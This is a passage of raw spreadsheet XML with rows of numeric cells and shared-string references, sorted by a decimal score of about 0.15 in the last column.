      </c>
      <c r="F29758" s="2">
        <v>0.1522988505747127</v>
      </c>
    </row>
    <row r="29759" ht="15.75" customHeight="1">
      <c r="A29759" s="1">
        <v>3412.0</v>
      </c>
      <c r="B29759" s="2">
        <v>3.8121477E7</v>
      </c>
      <c r="C29759" s="2" t="s">
        <v>28606</v>
      </c>
      <c r="D29759" s="2">
        <v>1.0</v>
      </c>
      <c r="E29759" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29759" s="2">
        <v>0.1520947176684882</v>
      </c>
    </row>
    <row r="29760" ht="15.75" customHeight="1">
      <c r="A29760" s="1">
        <v>31569.0</v>
      </c>
      <c r="B29760" s="2">
        <v>5122612.0</v>
      </c>
      <c r="C29760" s="2" t="s">
        <v>28607</v>
      </c>
      <c r="D29760" s="2">
        <v>1.0</v>
      </c>
      <c r="E29760" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29760" s="2">
        <v>0.1520947176684882</v>
      </c>
    </row>
    <row r="29761" ht="15.75" customHeight="1">
      <c r="A29761" s="1">
        <v>29606.0</v>
      </c>
      <c r="B29761" s="2">
        <v>3.3579686E7</v>
      </c>
      <c r="C29761" s="2" t="s">
        <v>28608</v>
      </c>
      <c r="D29761" s="2">
        <v>1.0</v>
      </c>
      <c r="E29761" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29761" s="2">
        <v>0.1519097222222223</v>
      </c>
    </row>
    <row r="29762" ht="15.75" customHeight="1">
      <c r="A29762" s="1">
        <v>31347.0</v>
      </c>
      <c r="B29762" s="2">
        <v>4983515.0</v>
      </c>
      <c r="C29762" s="2" t="s">
        <v>28609</v>
      </c>
      <c r="D29762" s="2">
        <v>1.0</v>
      </c>
      <c r="E29762" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29762" s="2">
        <v>0.1519097222222223</v>
      </c>
    </row>
    <row r="29763" ht="15.75" customHeight="1">
      <c r="A29763" s="1">
        <v>3333.0</v>
      </c>
      <c r="B29763" s="2">
        <v>3.7703358E7</v>
      </c>
      <c r="C29763" s="2" t="s">
        <v>28610</v>
      </c>
      <c r="D29763" s="2">
        <v>1.0</v>
      </c>
      <c r="E29763" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29763" s="2">
        <v>0.1517412935323384</v>
      </c>
    </row>
    <row r="29764" ht="15.75" customHeight="1">
      <c r="A29764" s="1">
        <v>18698.0</v>
      </c>
      <c r="B29764" s="2">
        <v>5.3607458E7</v>
      </c>
      <c r="C29764" s="2" t="s">
        <v>28611</v>
      </c>
      <c r="D29764" s="2">
        <v>1.0</v>
      </c>
      <c r="E29764" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29764" s="2">
        <v>0.1517412935323384</v>
      </c>
    </row>
    <row r="29765" ht="15.75" customHeight="1">
      <c r="A29765" s="1">
        <v>4206.0</v>
      </c>
      <c r="B29765" s="2">
        <v>4.167666E7</v>
      </c>
      <c r="C29765" s="2" t="s">
        <v>28612</v>
      </c>
      <c r="D29765" s="2">
        <v>1.0</v>
      </c>
      <c r="E29765" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29765" s="2">
        <v>0.1517412935323383</v>
      </c>
    </row>
    <row r="29766" ht="15.75" customHeight="1">
      <c r="A29766" s="1">
        <v>15694.0</v>
      </c>
      <c r="B29766" s="2">
        <v>4.3883697E7</v>
      </c>
      <c r="C29766" s="2" t="s">
        <v>28613</v>
      </c>
      <c r="D29766" s="2">
        <v>1.0</v>
      </c>
      <c r="E29766" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29766" s="2">
        <v>0.1516007532956686</v>
      </c>
    </row>
    <row r="29767" ht="15.75" customHeight="1">
      <c r="A29767" s="1">
        <v>7955.0</v>
      </c>
      <c r="B29767" s="2">
        <v>5.2654314E7</v>
      </c>
      <c r="C29767" s="2" t="s">
        <v>28614</v>
      </c>
      <c r="D29767" s="2">
        <v>1.0</v>
      </c>
      <c r="E29767" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29767" s="2">
        <v>0.1512820512820513</v>
      </c>
    </row>
    <row r="29768" ht="15.75" customHeight="1">
      <c r="A29768" s="1">
        <v>2759.0</v>
      </c>
      <c r="B29768" s="2">
        <v>3.5103425E7</v>
      </c>
      <c r="C29768" s="2" t="s">
        <v>28615</v>
      </c>
      <c r="D29768" s="2">
        <v>1.0</v>
      </c>
      <c r="E29768" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29768" s="2">
        <v>0.150925925925926</v>
      </c>
    </row>
    <row r="29769" ht="15.75" customHeight="1">
      <c r="A29769" s="1">
        <v>13845.0</v>
      </c>
      <c r="B29769" s="2">
        <v>3.683817E7</v>
      </c>
      <c r="C29769" s="2" t="s">
        <v>28616</v>
      </c>
      <c r="D29769" s="2">
        <v>1.0</v>
      </c>
      <c r="E29769" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29769" s="2">
        <v>0.1503831417624522</v>
      </c>
    </row>
    <row r="29770" ht="15.75" customHeight="1">
      <c r="A29770" s="1">
        <v>19498.0</v>
      </c>
      <c r="B29770" s="2">
        <v>5.5905397E7</v>
      </c>
      <c r="C29770" s="2" t="s">
        <v>28617</v>
      </c>
      <c r="D29770" s="2">
        <v>1.0</v>
      </c>
      <c r="E29770" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29770" s="2">
        <v>0.1503831417624521</v>
      </c>
    </row>
    <row r="29771" ht="15.75" customHeight="1">
      <c r="A29771" s="1">
        <v>2990.0</v>
      </c>
      <c r="B29771" s="2">
        <v>3.6229535E7</v>
      </c>
      <c r="C29771" s="2" t="s">
        <v>28618</v>
      </c>
      <c r="D29771" s="2">
        <v>1.0</v>
      </c>
      <c r="E29771" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29771" s="2">
        <v>0.1502732240437159</v>
      </c>
    </row>
    <row r="29772" ht="15.75" customHeight="1">
      <c r="A29772" s="1">
        <v>16429.0</v>
      </c>
      <c r="B29772" s="2">
        <v>4.6335716E7</v>
      </c>
      <c r="C29772" s="2" t="s">
        <v>28619</v>
      </c>
      <c r="D29772" s="2">
        <v>1.0</v>
      </c>
      <c r="E29772" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29772" s="2">
        <v>0.1502732240437159</v>
      </c>
    </row>
    <row r="29773" ht="15.75" customHeight="1">
      <c r="A29773" s="1">
        <v>33670.0</v>
      </c>
      <c r="B29773" s="2">
        <v>8422587.0</v>
      </c>
      <c r="C29773" s="2" t="s">
        <v>28620</v>
      </c>
      <c r="D29773" s="2">
        <v>1.0</v>
      </c>
      <c r="E29773" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29773" s="2">
        <v>0.1502732240437159</v>
      </c>
    </row>
    <row r="29774" ht="15.75" customHeight="1">
      <c r="A29774" s="1">
        <v>19732.0</v>
      </c>
      <c r="B29774" s="2">
        <v>5.6628786E7</v>
      </c>
      <c r="C29774" s="2" t="s">
        <v>28621</v>
      </c>
      <c r="D29774" s="2">
        <v>1.0</v>
      </c>
      <c r="E29774" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29774" s="2">
        <v>0.1501736111111112</v>
      </c>
    </row>
    <row r="29775" ht="15.75" customHeight="1">
      <c r="A29775" s="1">
        <v>10308.0</v>
      </c>
      <c r="B29775" s="2">
        <v>5.7671533E7</v>
      </c>
      <c r="C29775" s="2" t="s">
        <v>28622</v>
      </c>
      <c r="D29775" s="2">
        <v>1.0</v>
      </c>
      <c r="E29775" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29775" s="2">
        <v>0.15</v>
      </c>
    </row>
    <row r="29776" ht="15.75" customHeight="1">
      <c r="A29776" s="1">
        <v>4924.0</v>
      </c>
      <c r="B29776" s="2">
        <v>4.3984522E7</v>
      </c>
      <c r="C29776" s="2" t="s">
        <v>28623</v>
      </c>
      <c r="D29776" s="2">
        <v>1.0</v>
      </c>
      <c r="E29776" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29776" s="2">
        <v>0.1498538011695907</v>
      </c>
    </row>
    <row r="29777" ht="15.75" customHeight="1">
      <c r="A29777" s="1">
        <v>34205.0</v>
      </c>
      <c r="B29777" s="2">
        <v>2.1690779E7</v>
      </c>
      <c r="C29777" s="2" t="s">
        <v>28624</v>
      </c>
      <c r="D29777" s="2">
        <v>1.0</v>
      </c>
      <c r="E29777" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29777" s="2">
        <v>0.1498015873015874</v>
      </c>
    </row>
    <row r="29778" ht="15.75" customHeight="1">
      <c r="A29778" s="1">
        <v>15115.0</v>
      </c>
      <c r="B29778" s="2">
        <v>4.1874619E7</v>
      </c>
      <c r="C29778" s="2" t="s">
        <v>28625</v>
      </c>
      <c r="D29778" s="2">
        <v>1.0</v>
      </c>
      <c r="E29778" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29778" s="2">
        <v>0.149641577060932</v>
      </c>
    </row>
    <row r="29779" ht="15.75" customHeight="1">
      <c r="A29779" s="1">
        <v>25957.0</v>
      </c>
      <c r="B29779" s="2">
        <v>1.5266842E7</v>
      </c>
      <c r="C29779" s="2" t="s">
        <v>28626</v>
      </c>
      <c r="D29779" s="2">
        <v>1.0</v>
      </c>
      <c r="E29779" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29779" s="2">
        <v>0.149641577060932</v>
      </c>
    </row>
    <row r="29780" ht="15.75" customHeight="1">
      <c r="A29780" s="1">
        <v>7674.0</v>
      </c>
      <c r="B29780" s="2">
        <v>5.1899558E7</v>
      </c>
      <c r="C29780" s="2" t="s">
        <v>28627</v>
      </c>
      <c r="D29780" s="2">
        <v>1.0</v>
      </c>
      <c r="E29780" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29780" s="2">
        <v>0.1495726495726496</v>
      </c>
    </row>
    <row r="29781" ht="15.75" customHeight="1">
      <c r="A29781" s="1">
        <v>18205.0</v>
      </c>
      <c r="B29781" s="2">
        <v>5.2062865E7</v>
      </c>
      <c r="C29781" s="2" t="s">
        <v>28628</v>
      </c>
      <c r="D29781" s="2">
        <v>1.0</v>
      </c>
      <c r="E29781" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29781" s="2">
        <v>0.1495098039215687</v>
      </c>
    </row>
    <row r="29782" ht="15.75" customHeight="1">
      <c r="A29782" s="1">
        <v>33058.0</v>
      </c>
      <c r="B29782" s="2">
        <v>6821279.0</v>
      </c>
      <c r="C29782" s="2" t="s">
        <v>28629</v>
      </c>
      <c r="D29782" s="2">
        <v>1.0</v>
      </c>
      <c r="E29782" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29782" s="2">
        <v>0.1495098039215687</v>
      </c>
    </row>
    <row r="29783" ht="15.75" customHeight="1">
      <c r="A29783" s="1">
        <v>12387.0</v>
      </c>
      <c r="B29783" s="2">
        <v>2.884845E7</v>
      </c>
      <c r="C29783" s="2" t="s">
        <v>28630</v>
      </c>
      <c r="D29783" s="2">
        <v>1.0</v>
      </c>
      <c r="E29783" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29783" s="2">
        <v>0.1491769547325103</v>
      </c>
    </row>
    <row r="29784" ht="15.75" customHeight="1">
      <c r="A29784" s="1">
        <v>3943.0</v>
      </c>
      <c r="B29784" s="2">
        <v>4.0618236E7</v>
      </c>
      <c r="C29784" s="2" t="s">
        <v>28631</v>
      </c>
      <c r="D29784" s="2">
        <v>1.0</v>
      </c>
      <c r="E29784" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29784" s="2">
        <v>0.1484848484848485</v>
      </c>
    </row>
    <row r="29785" ht="15.75" customHeight="1">
      <c r="A29785" s="1">
        <v>5145.0</v>
      </c>
      <c r="B29785" s="2">
        <v>4.4655091E7</v>
      </c>
      <c r="C29785" s="2" t="s">
        <v>28632</v>
      </c>
      <c r="D29785" s="2">
        <v>1.0</v>
      </c>
      <c r="E29785" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29785" s="2">
        <v>0.1484848484848485</v>
      </c>
    </row>
    <row r="29786" ht="15.75" customHeight="1">
      <c r="A29786" s="1">
        <v>8830.0</v>
      </c>
      <c r="B29786" s="2">
        <v>5.4653656E7</v>
      </c>
      <c r="C29786" s="2" t="s">
        <v>28633</v>
      </c>
      <c r="D29786" s="2">
        <v>1.0</v>
      </c>
      <c r="E29786" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29786" s="2">
        <v>0.1484848484848485</v>
      </c>
    </row>
    <row r="29787" ht="15.75" customHeight="1">
      <c r="A29787" s="1">
        <v>11980.0</v>
      </c>
      <c r="B29787" s="2">
        <v>2.5829418E7</v>
      </c>
      <c r="C29787" s="2" t="s">
        <v>28634</v>
      </c>
      <c r="D29787" s="2">
        <v>1.0</v>
      </c>
      <c r="E29787" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29787" s="2">
        <v>0.1484848484848485</v>
      </c>
    </row>
    <row r="29788" ht="15.75" customHeight="1">
      <c r="A29788" s="1">
        <v>25792.0</v>
      </c>
      <c r="B29788" s="2">
        <v>1.4674387E7</v>
      </c>
      <c r="C29788" s="2" t="s">
        <v>28635</v>
      </c>
      <c r="D29788" s="2">
        <v>1.0</v>
      </c>
      <c r="E29788" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29788" s="2">
        <v>0.1484848484848485</v>
      </c>
    </row>
    <row r="29789" ht="15.75" customHeight="1">
      <c r="A29789" s="1">
        <v>4522.0</v>
      </c>
      <c r="B29789" s="2">
        <v>4.2616392E7</v>
      </c>
      <c r="C29789" s="2" t="s">
        <v>28636</v>
      </c>
      <c r="D29789" s="2">
        <v>1.0</v>
      </c>
      <c r="E29789" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29789" s="2">
        <v>0.1484674329501916</v>
      </c>
    </row>
    <row r="29790" ht="15.75" customHeight="1">
      <c r="A29790" s="1">
        <v>20703.0</v>
      </c>
      <c r="B29790" s="2">
        <v>1.4541556E7</v>
      </c>
      <c r="C29790" s="2" t="s">
        <v>28637</v>
      </c>
      <c r="D29790" s="2">
        <v>1.0</v>
      </c>
      <c r="E29790" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29790" s="2">
        <v>0.1484674329501916</v>
      </c>
    </row>
    <row r="29791" ht="15.75" customHeight="1">
      <c r="A29791" s="1">
        <v>7337.0</v>
      </c>
      <c r="B29791" s="2">
        <v>5.0944622E7</v>
      </c>
      <c r="C29791" s="2" t="s">
        <v>28638</v>
      </c>
      <c r="D29791" s="2">
        <v>1.0</v>
      </c>
      <c r="E29791" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29791" s="2">
        <v>0.1484517304189436</v>
      </c>
    </row>
    <row r="29792" ht="15.75" customHeight="1">
      <c r="A29792" s="1">
        <v>9959.0</v>
      </c>
      <c r="B29792" s="2">
        <v>5.6925279E7</v>
      </c>
      <c r="C29792" s="2" t="s">
        <v>28639</v>
      </c>
      <c r="D29792" s="2">
        <v>1.0</v>
      </c>
      <c r="E29792" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29792" s="2">
        <v>0.1484517304189436</v>
      </c>
    </row>
    <row r="29793" ht="15.75" customHeight="1">
      <c r="A29793" s="1">
        <v>11340.0</v>
      </c>
      <c r="B29793" s="2">
        <v>2.1207459E7</v>
      </c>
      <c r="C29793" s="2" t="s">
        <v>28640</v>
      </c>
      <c r="D29793" s="2">
        <v>1.0</v>
      </c>
      <c r="E29793" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29793" s="2">
        <v>0.1484517304189436</v>
      </c>
    </row>
    <row r="29794" ht="15.75" customHeight="1">
      <c r="A29794" s="1">
        <v>12639.0</v>
      </c>
      <c r="B29794" s="2">
        <v>3.033434E7</v>
      </c>
      <c r="C29794" s="2" t="s">
        <v>28641</v>
      </c>
      <c r="D29794" s="2">
        <v>1.0</v>
      </c>
      <c r="E29794" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29794" s="2">
        <v>0.1484375000000001</v>
      </c>
    </row>
    <row r="29795" ht="15.75" customHeight="1">
      <c r="A29795" s="1">
        <v>30445.0</v>
      </c>
      <c r="B29795" s="2">
        <v>3.9223644E7</v>
      </c>
      <c r="C29795" s="2" t="s">
        <v>28642</v>
      </c>
      <c r="D29795" s="2">
        <v>1.0</v>
      </c>
      <c r="E29795" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29795" s="2">
        <v>0.1484018264840183</v>
      </c>
    </row>
    <row r="29796" ht="15.75" customHeight="1">
      <c r="A29796" s="1">
        <v>15801.0</v>
      </c>
      <c r="B29796" s="2">
        <v>4.4218163E7</v>
      </c>
      <c r="C29796" s="2" t="s">
        <v>28643</v>
      </c>
      <c r="D29796" s="2">
        <v>1.0</v>
      </c>
      <c r="E29796" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29796" s="2">
        <v>0.1478758169934641</v>
      </c>
    </row>
    <row r="29797" ht="15.75" customHeight="1">
      <c r="A29797" s="1">
        <v>10912.0</v>
      </c>
      <c r="B29797" s="2">
        <v>1.6682175E7</v>
      </c>
      <c r="C29797" s="2" t="s">
        <v>28644</v>
      </c>
      <c r="D29797" s="2">
        <v>1.0</v>
      </c>
      <c r="E29797" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29797" s="2">
        <v>0.1478632478632479</v>
      </c>
    </row>
    <row r="29798" ht="15.75" customHeight="1">
      <c r="A29798" s="1">
        <v>3553.0</v>
      </c>
      <c r="B29798" s="2">
        <v>3.8780528E7</v>
      </c>
      <c r="C29798" s="2" t="s">
        <v>28645</v>
      </c>
      <c r="D29798" s="2">
        <v>1.0</v>
      </c>
      <c r="E29798" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29798" s="2">
        <v>0.1478494623655915</v>
      </c>
    </row>
    <row r="29799" ht="15.75" customHeight="1">
      <c r="A29799" s="1">
        <v>8852.0</v>
      </c>
      <c r="B29799" s="2">
        <v>5.4723792E7</v>
      </c>
      <c r="C29799" s="2" t="s">
        <v>28646</v>
      </c>
      <c r="D29799" s="2">
        <v>1.0</v>
      </c>
      <c r="E29799" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29799" s="2">
        <v>0.1478494623655915</v>
      </c>
    </row>
    <row r="29800" ht="15.75" customHeight="1">
      <c r="A29800" s="1">
        <v>8870.0</v>
      </c>
      <c r="B29800" s="2">
        <v>5.4746577E7</v>
      </c>
      <c r="C29800" s="2" t="s">
        <v>28646</v>
      </c>
      <c r="D29800" s="2">
        <v>1.0</v>
      </c>
      <c r="E29800" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29800" s="2">
        <v>0.1478494623655915</v>
      </c>
    </row>
    <row r="29801" ht="15.75" customHeight="1">
      <c r="A29801" s="1">
        <v>19167.0</v>
      </c>
      <c r="B29801" s="2">
        <v>5.4934939E7</v>
      </c>
      <c r="C29801" s="2" t="s">
        <v>28647</v>
      </c>
      <c r="D29801" s="2">
        <v>1.0</v>
      </c>
      <c r="E29801" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29801" s="2">
        <v>0.1478494623655915</v>
      </c>
    </row>
    <row r="29802" ht="15.75" customHeight="1">
      <c r="A29802" s="1">
        <v>12926.0</v>
      </c>
      <c r="B29802" s="2">
        <v>3.230255E7</v>
      </c>
      <c r="C29802" s="2" t="s">
        <v>28648</v>
      </c>
      <c r="D29802" s="2">
        <v>1.0</v>
      </c>
      <c r="E29802" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29802" s="2">
        <v>0.1478494623655914</v>
      </c>
    </row>
    <row r="29803" ht="15.75" customHeight="1">
      <c r="A29803" s="1">
        <v>15232.0</v>
      </c>
      <c r="B29803" s="2">
        <v>4.222078E7</v>
      </c>
      <c r="C29803" s="2" t="s">
        <v>28649</v>
      </c>
      <c r="D29803" s="2">
        <v>1.0</v>
      </c>
      <c r="E29803" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29803" s="2">
        <v>0.1478494623655914</v>
      </c>
    </row>
    <row r="29804" ht="15.75" customHeight="1">
      <c r="A29804" s="1">
        <v>26700.0</v>
      </c>
      <c r="B29804" s="2">
        <v>1.8152971E7</v>
      </c>
      <c r="C29804" s="2" t="s">
        <v>28650</v>
      </c>
      <c r="D29804" s="2">
        <v>1.0</v>
      </c>
      <c r="E29804" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29804" s="2">
        <v>0.1478494623655914</v>
      </c>
    </row>
    <row r="29805" ht="15.75" customHeight="1">
      <c r="A29805" s="1">
        <v>12262.0</v>
      </c>
      <c r="B29805" s="2">
        <v>2.8017419E7</v>
      </c>
      <c r="C29805" s="2" t="s">
        <v>28651</v>
      </c>
      <c r="D29805" s="2">
        <v>1.0</v>
      </c>
      <c r="E29805" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29805" s="2">
        <v>0.1478342749529191</v>
      </c>
    </row>
    <row r="29806" ht="15.75" customHeight="1">
      <c r="A29806" s="1">
        <v>25727.0</v>
      </c>
      <c r="B29806" s="2">
        <v>1.4541555E7</v>
      </c>
      <c r="C29806" s="2" t="s">
        <v>28652</v>
      </c>
      <c r="D29806" s="2">
        <v>1.0</v>
      </c>
      <c r="E29806" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29806" s="2">
        <v>0.1478342749529191</v>
      </c>
    </row>
    <row r="29807" ht="15.75" customHeight="1">
      <c r="A29807" s="1">
        <v>18892.0</v>
      </c>
      <c r="B29807" s="2">
        <v>5.4128932E7</v>
      </c>
      <c r="C29807" s="2" t="s">
        <v>28653</v>
      </c>
      <c r="D29807" s="2">
        <v>1.0</v>
      </c>
      <c r="E29807" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29807" s="2">
        <v>0.1474074074074074</v>
      </c>
    </row>
    <row r="29808" ht="15.75" customHeight="1">
      <c r="A29808" s="1">
        <v>34169.0</v>
      </c>
      <c r="B29808" s="2">
        <v>9923979.0</v>
      </c>
      <c r="C29808" s="2" t="s">
        <v>28654</v>
      </c>
      <c r="D29808" s="2">
        <v>1.0</v>
      </c>
      <c r="E29808" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29808" s="2">
        <v>0.1473429951690822</v>
      </c>
    </row>
    <row r="29809" ht="15.75" customHeight="1">
      <c r="A29809" s="1">
        <v>8065.0</v>
      </c>
      <c r="B29809" s="2">
        <v>5.2932293E7</v>
      </c>
      <c r="C29809" s="2" t="s">
        <v>28655</v>
      </c>
      <c r="D29809" s="2">
        <v>1.0</v>
      </c>
      <c r="E29809" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29809" s="2">
        <v>0.1473429951690821</v>
      </c>
    </row>
    <row r="29810" ht="15.75" customHeight="1">
      <c r="A29810" s="1">
        <v>26871.0</v>
      </c>
      <c r="B29810" s="2">
        <v>1.9099107E7</v>
      </c>
      <c r="C29810" s="2" t="s">
        <v>28656</v>
      </c>
      <c r="D29810" s="2">
        <v>1.0</v>
      </c>
      <c r="E29810" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29810" s="2">
        <v>0.1471734892787525</v>
      </c>
    </row>
    <row r="29811" ht="15.75" customHeight="1">
      <c r="A29811" s="1">
        <v>3883.0</v>
      </c>
      <c r="B29811" s="2">
        <v>4.036163E7</v>
      </c>
      <c r="C29811" s="2" t="s">
        <v>28657</v>
      </c>
      <c r="D29811" s="2">
        <v>1.0</v>
      </c>
      <c r="E29811" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29811" s="2">
        <v>0.1468253968253968</v>
      </c>
    </row>
    <row r="29812" ht="15.75" customHeight="1">
      <c r="A29812" s="1">
        <v>3202.0</v>
      </c>
      <c r="B29812" s="2">
        <v>3.7244579E7</v>
      </c>
      <c r="C29812" s="2" t="s">
        <v>28658</v>
      </c>
      <c r="D29812" s="2">
        <v>1.0</v>
      </c>
      <c r="E29812" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29812" s="2">
        <v>0.1465517241379311</v>
      </c>
    </row>
    <row r="29813" ht="15.75" customHeight="1">
      <c r="A29813" s="1">
        <v>6018.0</v>
      </c>
      <c r="B29813" s="2">
        <v>4.7497301E7</v>
      </c>
      <c r="C29813" s="2" t="s">
        <v>28659</v>
      </c>
      <c r="D29813" s="2">
        <v>1.0</v>
      </c>
      <c r="E29813" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29813" s="2">
        <v>0.1464646464646465</v>
      </c>
    </row>
    <row r="29814" ht="15.75" customHeight="1">
      <c r="A29814" s="1">
        <v>6780.0</v>
      </c>
      <c r="B29814" s="2">
        <v>4.9469305E7</v>
      </c>
      <c r="C29814" s="2" t="s">
        <v>28660</v>
      </c>
      <c r="D29814" s="2">
        <v>1.0</v>
      </c>
      <c r="E29814" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29814" s="2">
        <v>0.1464646464646465</v>
      </c>
    </row>
    <row r="29815" ht="15.75" customHeight="1">
      <c r="A29815" s="1">
        <v>14725.0</v>
      </c>
      <c r="B29815" s="2">
        <v>4.0668558E7</v>
      </c>
      <c r="C29815" s="2" t="s">
        <v>28661</v>
      </c>
      <c r="D29815" s="2">
        <v>1.0</v>
      </c>
      <c r="E29815" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29815" s="2">
        <v>0.1464646464646465</v>
      </c>
    </row>
    <row r="29816" ht="15.75" customHeight="1">
      <c r="A29816" s="1">
        <v>20446.0</v>
      </c>
      <c r="B29816" s="2">
        <v>1.2457589E7</v>
      </c>
      <c r="C29816" s="2" t="s">
        <v>28662</v>
      </c>
      <c r="D29816" s="2">
        <v>1.0</v>
      </c>
      <c r="E29816" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29816" s="2">
        <v>0.1464646464646465</v>
      </c>
    </row>
    <row r="29817" ht="15.75" customHeight="1">
      <c r="A29817" s="1">
        <v>29907.0</v>
      </c>
      <c r="B29817" s="2">
        <v>3607050.0</v>
      </c>
      <c r="C29817" s="2" t="s">
        <v>28663</v>
      </c>
      <c r="D29817" s="2">
        <v>1.0</v>
      </c>
      <c r="E29817" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29817" s="2">
        <v>0.1464646464646465</v>
      </c>
    </row>
    <row r="29818" ht="15.75" customHeight="1">
      <c r="A29818" s="1">
        <v>1418.0</v>
      </c>
      <c r="B29818" s="2">
        <v>2.6514618E7</v>
      </c>
      <c r="C29818" s="2" t="s">
        <v>28664</v>
      </c>
      <c r="D29818" s="2">
        <v>1.0</v>
      </c>
      <c r="E29818" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29818" s="2">
        <v>0.1461538461538462</v>
      </c>
    </row>
    <row r="29819" ht="15.75" customHeight="1">
      <c r="A29819" s="1">
        <v>6129.0</v>
      </c>
      <c r="B29819" s="2">
        <v>4.7800295E7</v>
      </c>
      <c r="C29819" s="2" t="s">
        <v>28665</v>
      </c>
      <c r="D29819" s="2">
        <v>1.0</v>
      </c>
      <c r="E29819" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29819" s="2">
        <v>0.1460905349794239</v>
      </c>
    </row>
    <row r="29820" ht="15.75" customHeight="1">
      <c r="A29820" s="1">
        <v>1696.0</v>
      </c>
      <c r="B29820" s="2">
        <v>2.8511842E7</v>
      </c>
      <c r="C29820" s="2" t="s">
        <v>28666</v>
      </c>
      <c r="D29820" s="2">
        <v>1.0</v>
      </c>
      <c r="E29820" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29820" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="29821" ht="15.75" customHeight="1">
      <c r="A29821" s="1">
        <v>2136.0</v>
      </c>
      <c r="B29821" s="2">
        <v>3.1532581E7</v>
      </c>
      <c r="C29821" s="2" t="s">
        <v>28667</v>
      </c>
      <c r="D29821" s="2">
        <v>1.0</v>
      </c>
      <c r="E29821" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29821" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="29822" ht="15.75" customHeight="1">
      <c r="A29822" s="1">
        <v>5163.0</v>
      </c>
      <c r="B29822" s="2">
        <v>4.4750575E7</v>
      </c>
      <c r="C29822" s="2" t="s">
        <v>28668</v>
      </c>
      <c r="D29822" s="2">
        <v>1.0</v>
      </c>
      <c r="E29822" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29822" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="29823" ht="15.75" customHeight="1">
      <c r="A29823" s="1">
        <v>7115.0</v>
      </c>
      <c r="B29823" s="2">
        <v>5.0375225E7</v>
      </c>
      <c r="C29823" s="2" t="s">
        <v>28669</v>
      </c>
      <c r="D29823" s="2">
        <v>1.0</v>
      </c>
      <c r="E29823" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29823" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="29824" ht="15.75" customHeight="1">
      <c r="A29824" s="1">
        <v>9159.0</v>
      </c>
      <c r="B29824" s="2">
        <v>5.5290515E7</v>
      </c>
      <c r="C29824" s="2" t="s">
        <v>28670</v>
      </c>
      <c r="D29824" s="2">
        <v>1.0</v>
      </c>
      <c r="E29824" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29824" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="29825" ht="15.75" customHeight="1">
      <c r="A29825" s="1">
        <v>14197.0</v>
      </c>
      <c r="B29825" s="2">
        <v>3.8205987E7</v>
      </c>
      <c r="C29825" s="2" t="s">
        <v>28671</v>
      </c>
      <c r="D29825" s="2">
        <v>1.0</v>
      </c>
      <c r="E29825" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29825" s="2">
